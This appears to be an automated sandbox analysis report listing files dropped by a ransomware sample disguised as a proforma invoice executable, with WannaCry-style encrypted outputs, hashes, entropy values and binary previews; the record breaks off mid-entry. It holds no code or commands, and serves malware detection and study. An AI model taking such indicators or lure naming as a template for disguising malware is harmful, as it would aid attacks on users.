                                                          Preview:WANACRY!......C.J.......1......tS.....M.g....<8U.B.p..63.......).....|SY[...y..vF..J.S(...._......AH.E.e...OD..?..{L...........L..hY.......c..$.*.<..P.,}.Ga.P..[.^n..M..9.f..M.TU.......#<.!....5S...BOU.Y..&...}.2...w...q.x...MTk...!.._6....nP..r................H........pQl.......s...6...U.\:.6.J...!....\..*..)]...z..Eq.1.M.f.ATp...8.1{2.6....Lxf..~./'%........jkSt>..v..1...D.\2.(...p... V|'U.EN....y4v......9.........E..M...W.|.sj.F..d).......3.....?...)...`tf]...f..y.v}. `C{...'..;.q..UKr8.<..."....kzTp....+L..C..Q.L..9...?09.:!.K.../r..SS....7....|`l.B........9.b.j.I......0E.)O..;..`..^..n.+.E......].)..~j../\.N,..s.i.....N...Eua..@..@.5...f.d..+~R..2...X.....Q.5.*P.....:.,.M\+{.....@..a ......5C.E.....8.......5.j'dSv...`..Bh".....@....Y...!...V|.&JR.....[.....C.:.p.....{m..,..../..aQ.j....../p....7..,..............n2;.(W..P2..R..)eEdP`!..."xP..+.....N..Ha......J.Z,.,........k=P8Ll8.c..&.y.....G..;..Eg .>d.Qo.g..............c..X..I.`_'

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\staticpwascripts-30998bff8f[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18856
                                                          Entropy (8bit):7.989446892853039
                                                          Encrypted:false
                                                          SSDEEP:384:1nBg3oK9blansjds6qxokJxSQlcfiavaowX/nuEeY6F3qw:1BXK/akdrqF0Qqwou/nuZY6F3qw
                                                          MD5:1615A7F30CA985553A1129F5EF6145F2
                                                          SHA1:41D22E9B154818E152F555BB64A6B1E7D6DA608A
                                                          SHA-256:0DA7A0DDF1E562D28E3882149E65D42FEF118B08D231F6AD62BEFEDF2A05747B
                                                          SHA-512:A9AE21958C86648F3512DC9B867D717AFD411C54916FDA2043431A4FAA93C36DA6B726D0E36419FBCE90416B280A8C0E6B90ED75A01B86D3C7A54EE507AC1277
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......C.J.......1......tS.....M.g....<8U.B.p..63.......).....|SY[...y..vF..J.S(...._......AH.E.e...OD..?..{L...........L..hY.......c..$.*.<..P.,}.Ga.P..[.^n..M..9.f..M.TU.......#<.!....5S...BOU.Y..&...}.2...w...q.x...MTk...!.._6....nP..r................H........pQl.......s...6...U.\:.6.J...!....\..*..)]...z..Eq.1.M.f.ATp...8.1{2.6....Lxf..~./'%........jkSt>..v..1...D.\2.(...p... V|'U.EN....y4v......9.........E..M...W.|.sj.F..d).......3.....?...)...`tf]...f..y.v}. `C{...'..;.q..UKr8.<..."....kzTp....+L..C..Q.L..9...?09.:!.K.../r..SS....7....|`l.B........9.b.j.I......0E.)O..;..`..^..n.+.E......].)..~j../\.N,..s.i.....N...Eua..@..@.5...f.d..+~R..2...X.....Q.5.*P.....:.,.M\+{.....@..a ......5C.E.....8.......5.j'dSv...`..Bh".....@....Y...!...V|.&JR.....[.....C.:.p.....{m..,..../..aQ.j....../p....7..,..............n2;.(W..P2..R..)eEdP`!..."xP..+.....N..Ha......J.Z,.,........k=P8Ll8.c..&.y.....G..;..Eg .>d.Qo.g..............c..X..I.`_'

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1573144
                                                          Entropy (8bit):7.999890750452653
                                                          Encrypted:true
                                                          SSDEEP:24576:uXFTues+NCDBPhT0O9sEHy/TxT0CqHzdbRK0IYd7KH0PerG:KY0NEPh79s9lqHzTK3YdOYe6
                                                          MD5:0B7B5B13D14D423489CA86417EFCAF57
                                                          SHA1:414F53804C7E1D887C7ED2133FC5155F02181E5B
                                                          SHA-256:C90031A1BE48A8D6359AC13FD9C2DB6D4363E7590A19D7A31E4268EB7BE04761
                                                          SHA-512:95994D9E928A4DDF886378433EA1D628AB65259288980DDBD66ABCFDCCBC8EAF3AEFF8138DFFA110E12BF6D29F1D4B77EC184598B58767AB3B37706E3B42ABF3
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....~..L.n..1Q.`.........8<...r.......`v..8.h}3..$.N7A$TfDo.F.^........L..&.z.y...n.^o.....GH........Q.*g<:..,..\.e.....?......V.R<\..~...$U....#B..B...WbN<\...]O.......!n.h..!r.c.J.9#p..ima.;;..#O.Ns3.....P..M..$.o.N.q`.?....dO.3.*=....`...vYS...9............y0i.'......k. t.4)H....|..gh.t.%_*.`.w!......i....7<..... ..38l.a....>Pi...Z.!eVZMN..p..6..z...J...#..l..}......d.... A.A.mbp..Y.r......Lk*.5..v....M...2b.."..L..R...m.0...`R...A..H....:.:x.U=vjR.LE...pc.7.z....).<b..&....t&...H.+.w< ..W....\.{..I..,..U..>.S.[.....C..lS.@F.i#4.j...e..f. ..Z..2.h.|...HAxAp.W.Tl2............T..pm..h.%.MW.....dUPB.Z..oa.>..1S.T.^2.5.c...3r6."r..BF...P.Q.|.0.z\.....8..?..q-6.9..YQ ..........G~..q|..>X.C&......*..a...:.......V.L`...Z....z.jn.n|..S$N....S.5.bHE....";.b.H...[&...7.....Z&.r...R...<{.%Q.....:./."..K%R3....".b.A.gS...H.jo..w.:..x.n...h$..d.<...W.z..w.,...P.....d...b..Y..#..j2.^X..NH.>...|=|u.XlL.d.D.x..%....@.....,.>...v.(..X..e....|..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1573144
                                                          Entropy (8bit):7.999890750452653
                                                          Encrypted:true
                                                          SSDEEP:24576:uXFTues+NCDBPhT0O9sEHy/TxT0CqHzdbRK0IYd7KH0PerG:KY0NEPh79s9lqHzTK3YdOYe6
                                                          MD5:0B7B5B13D14D423489CA86417EFCAF57
                                                          SHA1:414F53804C7E1D887C7ED2133FC5155F02181E5B
                                                          SHA-256:C90031A1BE48A8D6359AC13FD9C2DB6D4363E7590A19D7A31E4268EB7BE04761
                                                          SHA-512:95994D9E928A4DDF886378433EA1D628AB65259288980DDBD66ABCFDCCBC8EAF3AEFF8138DFFA110E12BF6D29F1D4B77EC184598B58767AB3B37706E3B42ABF3
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....~..L.n..1Q.`.........8<...r.......`v..8.h}3..$.N7A$TfDo.F.^........L..&.z.y...n.^o.....GH........Q.*g<:..,..\.e.....?......V.R<\..~...$U....#B..B...WbN<\...]O.......!n.h..!r.c.J.9#p..ima.;;..#O.Ns3.....P..M..$.o.N.q`.?....dO.3.*=....`...vYS...9............y0i.'......k. t.4)H....|..gh.t.%_*.`.w!......i....7<..... ..38l.a....>Pi...Z.!eVZMN..p..6..z...J...#..l..}......d.... A.A.mbp..Y.r......Lk*.5..v....M...2b.."..L..R...m.0...`R...A..H....:.:x.U=vjR.LE...pc.7.z....).<b..&....t&...H.+.w< ..W....\.{..I..,..U..>.S.[.....C..lS.@F.i#4.j...e..f. ..Z..2.h.|...HAxAp.W.Tl2............T..pm..h.%.MW.....dUPB.Z..oa.>..1S.T.^2.5.c...3r6."r..BF...P.Q.|.0.z\.....8..?..q-6.9..YQ ..........G~..q|..>X.C&......*..a...:.......V.L`...Z....z.jn.n|..S$N....S.5.bHE....";.b.H...[&...7.....Z&.r...R...<{.%Q.....:./."..K%R3....".b.A.gS...H.jo..w.:..x.n...h$..d.<...W.z..w.,...P.....d...b..Y..#..j2.^X..NH.>...|=|u.XlL.d.D.x..%....@.....,.>...v.(..X..e....|..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1573144
                                                          Entropy (8bit):7.999887105237829
                                                          Encrypted:true
                                                          SSDEEP:24576:qsKTEh1bKruwo+i5vpOPv9ldqX0vpMMf9bJ9vieDC5MFKP9SdZNmuGcBLI:MTMbuM5v8PBqXCXDviem5MFK41muZBLI
                                                          MD5:09DF1C45C6F899BC2138B25FE528A3FF
                                                          SHA1:1131B17F80ECD551072F1F93AA2E1AAEBFFB806A
                                                          SHA-256:864E020C74B679ABA455FF7500BD838FAF00825EA4D78610C846575C567533E1
                                                          SHA-512:E66EE233D5963585840B1960309EC69EC8D67E456CDFFE92AB3E63536E201681D6E7F0DF791B439FAAF1BF4A1AFD6662D050CCFD1F2F765C2E055314A53DF09B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....q..8..N....(o.3pt...........A..q~.../...A0&.,X3t.s....3,.V3...&..3.2W...R.[._.[D..U]Hxq.U>'....o...............L...%..zzH.....3.&".9((...J...v.r..4a...K.N=T....4v..X*..QS......x...%.q....w;4j...eE.......$..hg...< ..$u...!.F>C....../z.O...............CF/.n..DS.".\*...s@....R..Zk..l..{s.O@.\..&|3*.0.....B....(G........9.....i.@6.p7..K../...'.ft:.f./O....pu.FF.A...K...#..zZ?...F.}+.W.(.....d....7$..j^....gN-...PX...^....'DXT.....B.].(.......(j|...;..h... .'qB.......q.....?....v.b3et;..]..3.jkIrx.L....T8.`9.?..3.Y......qO"..[AS`...w.V.......n.k,.u..+....z.....A.`_...^.....vHT:.....(f.?.K.,.YQ..~.:.-.A...D.?.1.c..J%.-3......:.e..z..4..q.]Z?. ..8Ng.OuO$.u.s87.WJWW\..qq.....P........\6l.V.)......U.k.)....v*....pE.....J.\60.W.N+.z.r..g....m$J....'...>.r_...L...T6..u^...n...OCo...dR...+.bv...<$....G.......1.%..z.b....XvI._....^..*.Fp.V..........[.N......X..r....6..U.R...-...G#.>....O.!..h..../.}R.....OA~j&...T.cP.....[.m..}..p..Y.>....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1573144
                                                          Entropy (8bit):7.999887105237829
                                                          Encrypted:true
                                                          SSDEEP:24576:qsKTEh1bKruwo+i5vpOPv9ldqX0vpMMf9bJ9vieDC5MFKP9SdZNmuGcBLI:MTMbuM5v8PBqXCXDviem5MFK41muZBLI
                                                          MD5:09DF1C45C6F899BC2138B25FE528A3FF
                                                          SHA1:1131B17F80ECD551072F1F93AA2E1AAEBFFB806A
                                                          SHA-256:864E020C74B679ABA455FF7500BD838FAF00825EA4D78610C846575C567533E1
                                                          SHA-512:E66EE233D5963585840B1960309EC69EC8D67E456CDFFE92AB3E63536E201681D6E7F0DF791B439FAAF1BF4A1AFD6662D050CCFD1F2F765C2E055314A53DF09B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....q..8..N....(o.3pt...........A..q~.../...A0&.,X3t.s....3,.V3...&..3.2W...R.[._.[D..U]Hxq.U>'....o...............L...%..zzH.....3.&".9((...J...v.r..4a...K.N=T....4v..X*..QS......x...%.q....w;4j...eE.......$..hg...< ..$u...!.F>C....../z.O...............CF/.n..DS.".\*...s@....R..Zk..l..{s.O@.\..&|3*.0.....B....(G........9.....i.@6.p7..K../...'.ft:.f./O....pu.FF.A...K...#..zZ?...F.}+.W.(.....d....7$..j^....gN-...PX...^....'DXT.....B.].(.......(j|...;..h... .'qB.......q.....?....v.b3et;..]..3.jkIrx.L....T8.`9.?..3.Y......qO"..[AS`...w.V.......n.k,.u..+....z.....A.`_...^.....vHT:.....(f.?.K.,.YQ..~.:.-.A...D.?.1.c..J%.-3......:.e..z..4..q.]Z?. ..8Ng.OuO$.u.s87.WJWW\..qq.....P........\6l.V.)......U.k.)....v*....pE.....J.\60.W.N+.z.r..g....m$J....'...>.r_...L...T6..u^...n...OCo...dR...+.bv...<$....G.......1.%..z.b....XvI._....^..*.Fp.V..........[.N......X..r....6..U.R...-...G#.>....O.!..h..../.}R.....OA~j&...T.cP.....[.m..}..p..Y.>....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):91752
                                                          Entropy (8bit):7.998073211172385
                                                          Encrypted:true
                                                          SSDEEP:1536:eVEbsV01AM4RBEioBR4k8MCcp+BH4z5TMw+homJT33rcWCEV3V6OUT6nXtxB:OssNrEicR4kQcp+s5TSu43wQllUT6nh
                                                          MD5:3A2679865C51868E6C973328B164B698
                                                          SHA1:1EBF50CE7070B8F39F204B8B0B8630FC1BAFDBBE
                                                          SHA-256:878A7701A389F17B44A937563C421B01D5C5FD47A701154C098D12F4915BE050
                                                          SHA-512:06074A00E9BD98A7E0B53C3F3600C84F6F8368EC82F63A6DC95B537E6863BA208443369C4863CCC4DAAA52C21E869516AD689FEFF730F100E0CF5A4B02385CA4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Baq....A...\.G.!.WO.R.X\!..5./F.........*z.{..i..U'..Lq0.........7v~>Q..3w7.}....Q..V{...f.....4..T.q.bg.uCkc.....w*..d..+.......J....-..b......D..5.!../.qu.Q.[.&4.h.C0..I.pq.. ..E...9D.R.y.m.=...../.......}.....<.2?.+..hn^..Y.=)...W..(R..#(....De..........Q....!.......\.#.....+.*.`.=A...37._W..b......$/_"......pL...5.g.2n.g.....R\Mm...{.w.,.!kV....5?'.sc"...;X..~.Z...M.O.,>SB.>.....a.....]..b..d.22.F...4.NVwV..l....d.......@....Y.gl....t..V;..o..A>....R..m&.OR..^......~..h.$&..%.s...f...7..0.qlS.$..6#...Rm...H.E..h7W......0.K.C.c5.l...............>x..;..P+.T...2.....~..."O.............n...{.@..wO.....{.b/>.`...|....}.".8....$}.q..8.....d.O..P.1...C...xg.wx.".R<.A..W.m.u._(S..ep.).fI......I.3...!.........c.N..{...ezZ.7.....*\..+...j.:../..I..X0.fh.L....{...H..._.;.b......N...E..].P....S..D(C...f.....c..O7$/k..(...'S.4A.......V.a..>...."a.74..)]......Q\...i...jHw=.2+d*(.y.[.v......(..-..0.....*Q...MV.......B;Z/...U...6.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):91752
                                                          Entropy (8bit):7.998073211172385
                                                          Encrypted:true
                                                          SSDEEP:1536:eVEbsV01AM4RBEioBR4k8MCcp+BH4z5TMw+homJT33rcWCEV3V6OUT6nXtxB:OssNrEicR4kQcp+s5TSu43wQllUT6nh
                                                          MD5:3A2679865C51868E6C973328B164B698
                                                          SHA1:1EBF50CE7070B8F39F204B8B0B8630FC1BAFDBBE
                                                          SHA-256:878A7701A389F17B44A937563C421B01D5C5FD47A701154C098D12F4915BE050
                                                          SHA-512:06074A00E9BD98A7E0B53C3F3600C84F6F8368EC82F63A6DC95B537E6863BA208443369C4863CCC4DAAA52C21E869516AD689FEFF730F100E0CF5A4B02385CA4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Baq....A...\.G.!.WO.R.X\!..5./F.........*z.{..i..U'..Lq0.........7v~>Q..3w7.}....Q..V{...f.....4..T.q.bg.uCkc.....w*..d..+.......J....-..b......D..5.!../.qu.Q.[.&4.h.C0..I.pq.. ..E...9D.R.y.m.=...../.......}.....<.2?.+..hn^..Y.=)...W..(R..#(....De..........Q....!.......\.#.....+.*.`.=A...37._W..b......$/_"......pL...5.g.2n.g.....R\Mm...{.w.,.!kV....5?'.sc"...;X..~.Z...M.O.,>SB.>.....a.....]..b..d.22.F...4.NVwV..l....d.......@....Y.gl....t..V;..o..A>....R..m&.OR..^......~..h.$&..%.s...f...7..0.qlS.$..6#...Rm...H.E..h7W......0.K.C.c5.l...............>x..;..P+.T...2.....~..."O.............n...{.@..wO.....{.b/>.`...|....}.".8....$}.q..8.....d.O..P.1...C...xg.wx.".R<.A..W.m.u._(S..ep.).fI......I.3...!.........c.N..{...ezZ.7.....*\..+...j.:../..I..X0.fh.L....{...H..._.;.b......N...E..].P....S..D(C...f.....c..O7$/k..(...'S.4A.......V.a..>...."a.74..)]......Q\...i...jHw=.2+d*(.y.[.v......(..-..0.....*Q...MV.......B;Z/...U...6.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\1dU-gngnSbFHyDXzxcnjLbIIJkA.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):15160
                                                          Entropy (8bit):7.987921710559333
                                                          Encrypted:false
                                                          SSDEEP:384:vxnaFziFBgetC+he+d/gd5+eQEdns+UCR4BcFzW0bBR:ZaiDLgygd5+eQE9sER4etZ
                                                          MD5:4320BB19799471975A703C9D292A1FAE
                                                          SHA1:6B36F6E8904AC3D4E9BA350C8F71313E983C7F32
                                                          SHA-256:6707D3BCFC153BBDBAFF8B3754578EB24B09E633077B7788F7556C5FDFC5D19C
                                                          SHA-512:24E03342253350827C5D37D06DF376C5962B976A25F3B337ECF1EE601100E377067E7DDCBE76F28F34FE1571CA46FF4EFF7F8F65D245D34108233F733B995072
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....i+.. .Z.q"I1..9.......DF6....T..G.....n_.....z.w}s...,.y.c..s.#...l...34.N.Y..S..........^.-.85..^.WD4.Y.0..j{$...^....,.a~....6..&e....W..^.......?.6.M..$.I..K.i}h.R]d.{...@..x\o&"..<.-...Y....j.1xZ.^y..R........8>...f;Zr.6}..?.v..tf9.,.'..G......:.......}I.]....+W.5..`...4.6.).....n%BR.i.v...Z....,....l...tl@.....e6...<...(.H.K`.f...i"!.;...W.\....r....1..;.a.S......\......f.......&.Uj..W#!......x-.....n.X[K....wp.?.....x.^.Iu.\c.6..../..\....X.......>.P...qd...../...`A....w..*.....X.@....\]..i..8..c......Ri.."}.>7..."`....D;.Tp.{.bg.h...l..Q.1Fg...5Hy...G...u.Ti....^K.f......+6.4...........7..N.qt.....N8......m...?Wg..QR...*...5.s2.....+=.....7.3e....e..@....~........~k..(1m.h..n....E.EN...R......_..P.B....6!G....< ....wR..w...|.6.6T)...../\.G..qf...~........".FD3.i-.f.;t.M^"....y..!B'...KN....6N..^..nM.SYg./2*..~.............19..~j..k,.I...(6..U.....l.../..<.../....%7......"...s...6.......6.].im...5...]#..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\1dU-gngnSbFHyDXzxcnjLbIIJkA.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):15160
                                                          Entropy (8bit):7.987921710559333
                                                          Encrypted:false
                                                          SSDEEP:384:vxnaFziFBgetC+he+d/gd5+eQEdns+UCR4BcFzW0bBR:ZaiDLgygd5+eQE9sER4etZ
                                                          MD5:4320BB19799471975A703C9D292A1FAE
                                                          SHA1:6B36F6E8904AC3D4E9BA350C8F71313E983C7F32
                                                          SHA-256:6707D3BCFC153BBDBAFF8B3754578EB24B09E633077B7788F7556C5FDFC5D19C
                                                          SHA-512:24E03342253350827C5D37D06DF376C5962B976A25F3B337ECF1EE601100E377067E7DDCBE76F28F34FE1571CA46FF4EFF7F8F65D245D34108233F733B995072
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....i+.. .Z.q"I1..9.......DF6....T..G.....n_.....z.w}s...,.y.c..s.#...l...34.N.Y..S..........^.-.85..^.WD4.Y.0..j{$...^....,.a~....6..&e....W..^.......?.6.M..$.I..K.i}h.R]d.{...@..x\o&"..<.-...Y....j.1xZ.^y..R........8>...f;Zr.6}..?.v..tf9.,.'..G......:.......}I.]....+W.5..`...4.6.).....n%BR.i.v...Z....,....l...tl@.....e6...<...(.H.K`.f...i"!.;...W.\....r....1..;.a.S......\......f.......&.Uj..W#!......x-.....n.X[K....wp.?.....x.^.Iu.\c.6..../..\....X.......>.P...qd...../...`A....w..*.....X.@....\]..i..8..c......Ri.."}.>7..."`....D;.Tp.{.bg.h...l..Q.1Fg...5Hy...G...u.Ti....^K.f......+6.4...........7..N.qt.....N8......m...?Wg..QR...*...5.s2.....+=.....7.3e....e..@....~........~k..(1m.h..n....E.EN...R......_..P.B....6!G....< ....wR..w...|.6.6T)...../\.G..qf...~........".FD3.i-.f.;t.M^"....y..!B'...KN....6N..^..nM.SYg./2*..~.............19..~j..k,.I...(6..U.....l.../..<.../....%7......"...s...6.......6.].im...5...]#..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\4BpQ1bD8vX1mXuJObN-gg9RqkyQ.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1240
                                                          Entropy (8bit):7.85211329815188
                                                          Encrypted:false
                                                          SSDEEP:24:bkhb1iwNQSZr7xmb4vMEzU6lZxDTKtpibRki94R6ZTjXoFmMnX8qp:bkhbKQ7xmdEzFZxDIMdP4UZTwX8e
                                                          MD5:F6D630C3B97FA74819F9C1ADC805842F
                                                          SHA1:6675E6DBE21991C76184DDD4CA24DB9D27922BAF
                                                          SHA-256:19EC14B5C74E39CF78FC1B0018A57CF48C25866A94BB061E137A1E018CB2D533
                                                          SHA-512:DFB41396D98F6170C9DCFAFFD3E3F376688ECBF03EB21B9AD04CE7627E826B2595AEE5E3C0589DDAAB4219CA1D92D861EB2D2863A1B6715913418D71AF074E3B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....\.S..^`}RG..|.-.l.TEk...vd..^......z.!M.Ly...S.....$.=.$X......P..b........1..M...U...-...59.O...R.A..N.1x.~m....g......Iq..o.....sJ ....%...r/...V./?+.....]+".t{W..&.8.1.%.ejia.C.18/..;.....14^Y.Z..V.T:.]Fq...2....e(9..F....K.j.YT.\Z.>.f..}J.J.9...............{.5kc.X.j..B..A.....m.\-BH..2.t.....J....f~....|..#:.l.n.n.8.?4)..|..&0m..T..=.g.`.:S.......`.m.a/8H'..j&&#w......D..b../v...\.Q...-mr..H.6o......x...i6...6>.L...2.....7..{,._....\./T.........+;..c...D...yBg.......a...........]M......+..,..l>{.s..o.......R...g-K..K.x.2.8..J....l..g.5.a*B....{.$.(...2.<...V!,.@n..Z.r..8.t.M..=F...K.UW1*v!.+..R.SBi.'....y..uv.z...z`..^....t..6B.w.d..ob.(Y.:..}......Y.'&....bn.`SAQ.....h..F...!%.n:....G.....O.\.|.p&..9.,.....d.r/....g2..=....-..g.....=r.)....IQm...zvS!.pA3Vr9...0....o..H....".z....FN|P.....r...S...B.b.3.....h..@u..H<...."kAB;.MJ...J.....wd......3..8l@.E..4.......F..'..:.B.j.....Do.U.......w.cU....X.Mx.G..........WG....j.Q.<...3.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\4BpQ1bD8vX1mXuJObN-gg9RqkyQ.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1240
                                                          Entropy (8bit):7.85211329815188
                                                          Encrypted:false
                                                          SSDEEP:24:bkhb1iwNQSZr7xmb4vMEzU6lZxDTKtpibRki94R6ZTjXoFmMnX8qp:bkhbKQ7xmdEzFZxDIMdP4UZTwX8e
                                                          MD5:F6D630C3B97FA74819F9C1ADC805842F
                                                          SHA1:6675E6DBE21991C76184DDD4CA24DB9D27922BAF
                                                          SHA-256:19EC14B5C74E39CF78FC1B0018A57CF48C25866A94BB061E137A1E018CB2D533
                                                          SHA-512:DFB41396D98F6170C9DCFAFFD3E3F376688ECBF03EB21B9AD04CE7627E826B2595AEE5E3C0589DDAAB4219CA1D92D861EB2D2863A1B6715913418D71AF074E3B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....\.S..^`}RG..|.-.l.TEk...vd..^......z.!M.Ly...S.....$.=.$X......P..b........1..M...U...-...59.O...R.A..N.1x.~m....g......Iq..o.....sJ ....%...r/...V./?+.....]+".t{W..&.8.1.%.ejia.C.18/..;.....14^Y.Z..V.T:.]Fq...2....e(9..F....K.j.YT.\Z.>.f..}J.J.9...............{.5kc.X.j..B..A.....m.\-BH..2.t.....J....f~....|..#:.l.n.n.8.?4)..|..&0m..T..=.g.`.:S.......`.m.a/8H'..j&&#w......D..b../v...\.Q...-mr..H.6o......x...i6...6>.L...2.....7..{,._....\./T.........+;..c...D...yBg.......a...........]M......+..,..l>{.s..o.......R...g-K..K.x.2.8..J....l..g.5.a*B....{.$.(...2.<...V!,.@n..Z.r..8.t.M..=F...K.UW1*v!.+..R.SBi.'....y..uv.z...z`..^....t..6B.w.d..ob.(Y.:..}......Y.'&....bn.`SAQ.....h..F...!%.n:....G.....O.\.|.p&..9.,.....d.r/....g2..=....-..g.....=r.)....IQm...zvS!.pA3Vr9...0....o..H....".z....FN|P.....r...S...B.b.3.....h..@u..H<...."kAB;.MJ...J.....wd......3..8l@.E..4.......F..'..:.B.j.....Do.U.......w.cU....X.Mx.G..........WG....j.Q.<...3.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):45736
                                                          Entropy (8bit):7.9953329263347515
                                                          Encrypted:true
                                                          SSDEEP:768:jbufkD8X9a5+udN5VbxoV+QX7uZ148ghofA6FLBUfwUNyxa+WVJ34DpfU35Brz36:jaf08X9KbPxhmuZ1L7Va+4JoUJBrpvGV
                                                          MD5:612FC3133952349E230B1CFE5BC2C218
                                                          SHA1:0D26948E9BB764F67486548D09763255500050AE
                                                          SHA-256:192E4C5B714AEA88BF9834A7EFE7C2D76BCB24E01E2396869F60C169634D13C8
                                                          SHA-512:2CEE9BB4B13A906159DAFDB195823E8308F9485FD5F2EE1FB27FC2B0253BADD90AC80723EE4AB0084E903E0ED1E2EE531EF3B392CB25F9C18C8AB830900AE4FA
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......D.M>.dp...^..y6.o...%.j.r....@.hT.... ..`.0..]...*....y..4KL.z.....wM..s.^...`I.+T......+4.S..<..wE(X...m..x*A...a...X......ag.l(.@.d....6G.u.0WH.F~..@"D.W...G.....x.<.6...._%....J..".y.....F..#wdo.)w....74.St......[...+.....1R.....,..5../^.................y.^.....c..*..B... .py...`..\..L7...^.=.....b...;....v..:....@.....E.U.f.K...ao7....z.w....bN..p....[....c....w...|ro.kV...t.@R....)2.ZG....;'.PD./.....0....I./g.tW7.................,.......dL 1.....*"....>.?...J...*.F.'.X..E&....]#z.....k.kV..JH..Y@.......5J..$.amip.0E.../...`.wwu..C^.J......r.A...N...t.J.kPZK]9...l%.e....Z. Q..#.&.VW[<..q`5Z}.....g.@2....Ty<....w.P.z.-..f.t.1...My.?..?..U.z....lY.VAVd.q.o..E......s...J....;...s.]._.\.-.M..a.b..;D.........S.lp.~.9.^9........."..p..<v....En!..sG.....b.......Zp..b|.H.:....*...QIp....|.J.Cj.pjG.{N^]...$"y{;v'0....6.n..JUQ$...M)..06at.`...E....l......f..).[n._..P.KO...`B....)...T|..|2...#N.V...0\.....Ehf..B_....l..v.vPG.A..T.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):45736
                                                          Entropy (8bit):7.9953329263347515
                                                          Encrypted:true
